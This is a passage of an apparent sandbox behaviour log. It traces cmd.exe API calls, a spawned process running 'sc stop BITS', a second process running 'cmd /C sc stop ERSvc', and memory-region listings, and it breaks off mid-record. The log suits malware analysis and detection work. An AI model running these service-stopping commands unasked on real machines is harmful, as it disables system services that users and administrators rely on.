[0020.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f8d8, cchData=128 | out: lpLCData="0") returned 2 [0020.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f8d8, cchData=128 | out: lpLCData="0") returned 2 [0020.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f8d8, cchData=128 | out: lpLCData="1") returned 2 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0020.778] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0020.778] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0020.779] GetConsoleTitleW (in: lpConsoleTitle=0x2e2da0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.779] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0020.779] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0020.779] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0020.779] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0020.780] _wcsicmp (_String1="sc", _String2=")") returned 74 [0020.780] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0020.780] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0020.780] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0020.780] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0020.780] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0020.780] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0020.781] GetConsoleTitleW (in: lpConsoleTitle=0x18f5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.781] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0020.781] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0020.781] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0020.781] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0020.781] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0020.781] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0020.781] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0020.781] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0020.781] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0020.781] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0020.781] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0020.781] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0020.781] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0020.781] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0020.781] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0020.781] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0020.781] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0020.781] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0020.781] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0020.781] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0020.782] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0020.782] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0020.782] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0020.782] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0020.782] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0020.782] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0020.782] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0020.782] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0020.782] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0020.782] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0020.782] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0020.782] _wcsicmp (_String1="sc", _String2="START") returned -17 [0020.782] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0020.782] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0020.782] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0020.782] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0020.782] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0020.782] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0020.782] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0020.782] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0020.782] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0020.782] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0020.782] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0020.782] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0020.782] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0020.782] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0020.782] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0020.782] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0020.782] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0020.782] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0020.782] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0020.782] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0020.782] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0020.782] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0020.782] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0020.782] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0020.782] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0020.782] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0020.782] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0020.782] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0020.783] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0020.783] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0020.783] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0020.783] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0020.783] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0020.783] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0020.783] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0020.783] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0020.783] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0020.783] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0020.783] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0020.783] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0020.783] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0020.783] _wcsicmp (_String1="sc", _String2="START") returned -17 [0020.783] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0020.783] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0020.783] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0020.783] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0020.783] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0020.783] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0020.783] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0020.783] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0020.783] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0020.783] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0020.783] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0020.783] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0020.783] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0020.783] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0020.783] SetErrorMode (uMode=0x0) returned 0x0 [0020.783] SetErrorMode (uMode=0x1) returned 0x0 [0020.783] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2d07f8, lpFilePart=0x18f0f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f0f0*="Desktop") returned 0x25 [0020.783] SetErrorMode (uMode=0x0) returned 0x1 [0020.784] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.784] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0020.787] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.788] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x18ee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee6c) returned 0xffffffff [0020.788] GetLastError () returned 0x2 [0020.788] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x18ee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee6c) returned 0xffffffff [0020.788] GetLastError () returned 0x2 [0020.789] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.789] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x18ee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee6c) returned 0x2e3408 [0020.789] FindClose (in: hFindFile=0x2e3408 | out: hFindFile=0x2e3408) returned 1 [0020.789] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x18ee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee6c) returned 0xffffffff [0020.789] GetLastError () returned 0x2 [0020.789] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ee6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee6c) returned 0x2e3408 [0020.789] FindClose (in: hFindFile=0x2e3408 | out: hFindFile=0x2e3408) returned 1 [0020.789] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0020.789] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0020.789] GetConsoleTitleW (in: lpConsoleTitle=0x18f364, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.789] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f1ec, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f2b4 | out: lpAttributeList=0x18f1ec, lpSize=0x18f2b4) returned 1 [0020.789] UpdateProcThreadAttribute (in: lpAttributeList=0x18f1ec, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f2ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f1ec, lpPreviousValue=0x0) returned 1 [0020.789] GetStartupInfoW (in: lpStartupInfo=0x18f1a8 | out: lpStartupInfo=0x18f1a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0020.789] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0020.789] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0020.789] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0020.789] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.790] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.791] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0020.792] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop BITS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18f248*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop BITS", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f294 | out: lpCommandLine="sc stop BITS", lpProcessInformation=0x18f294*(hProcess=0x78, hThread=0x74, dwProcessId=0xadc, dwThreadId=0xae0)) returned 1 [0020.795] CloseHandle (hObject=0x74) returned 1 [0020.795] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0020.796] GetEnvironmentStringsW () returned 0x2e5ed8* [0020.796] FreeEnvironmentStringsW (penv=0x2e5ed8) returned 1 [0020.796] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0021.845] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x18f188 | out: lpExitCode=0x18f188*=0x426) returned 1 [0021.845] CloseHandle (hObject=0x78) returned 1 [0021.845] _vsnwprintf (in: _Buffer=0x18f2d0, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f194 | out: _Buffer="00000426") returned 8 [0021.845] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000426") returned 1 [0021.845] GetEnvironmentStringsW () returned 0x2e4098* [0021.845] FreeEnvironmentStringsW (penv=0x2e4098) returned 1 [0021.845] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0021.845] GetEnvironmentStringsW () returned 0x2e4098* [0021.846] FreeEnvironmentStringsW (penv=0x2e4098) returned 1 [0021.846] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f1ec | out: lpAttributeList=0x18f1ec) [0021.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.846] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.846] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.846] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.846] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.846] SetConsoleInputExeNameW () returned 0x1 [0021.846] GetConsoleOutputCP () returned 0x1b5 [0021.846] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.846] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.847] exit (_Code=1062) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x63f7e000" os_pid = "0xa94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C sc stop ERSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 480 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 481 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 482 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 483 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 484 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 485 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 486 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 487 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 488 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 489 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 490 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 491 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 492 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 493 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 494 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 495 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 496 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 497 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 498 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 499 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 500 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 768 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 769 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 770 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 771 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 772 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 773 start_va = 0x74c80000 end_va = 0x74c86fff entry_point = 0x74c81230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 774 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 775 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 776 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 777 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 778 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 779 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 780 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 781 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 782 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 783 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 784 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 785 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 786 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 787 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 788 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 789 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 790 start_va = 0x5a0000 end_va = 0x727fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 791 start_va = 0x767d0000 end_va = 